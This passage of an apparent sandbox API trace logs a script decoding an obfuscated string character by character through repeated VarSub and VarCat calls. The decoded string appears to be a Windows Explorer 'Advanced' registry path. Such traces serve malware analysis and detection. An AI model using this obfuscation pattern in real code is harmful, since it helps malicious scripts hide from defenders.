pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.282] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0168.283] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.283] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0168.283] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.284] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.284] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.285] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0168.285] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.286] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0168.286] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.287] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.287] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.288] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.288] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.289] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.289] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.290] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.290] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.290] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0168.291] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.291] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0168.292] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.292] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.292] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.292] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.454] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.454] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.454] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.455] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.455] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.455] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.455] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0168.455] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.456] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.456] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0168.456] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.457] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.457] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.457] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.458] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.458] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.458] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.458] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.459] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.459] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.459] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.459] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.459] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.460] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0168.460] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.460] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="…", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="…\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.460] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="x", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="x") returned 1 [0168.461] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.461] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.461] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.461] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0168.462] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.462] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0168.462] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.463] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0168.463] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.464] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.464] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.464] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.464] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.473] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.474] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.474] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0168.475] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.475] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.475] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.475] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.476] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.476] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0168.476] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.477] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.477] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.477] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.478] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0168.478] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.478] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0168.479] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.479] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.479] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.479] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0168.480] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.502] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.502] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.502] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0168.502] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.503] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.503] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.503] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0168.503] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.504] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11596d4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0168.504] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.505] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0x1167dbc, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0168.505] VarCat (in: pvarLeft=0x28f8e0, pvarRight=0x28f960, pvarResult=0x28f848 | out: pvarResult=0x28f848) returned 0x0 [0168.505] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f656, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0168.506] VarSub (in: pvarLeft=0x28fa20, pvarRight=0x28f818, 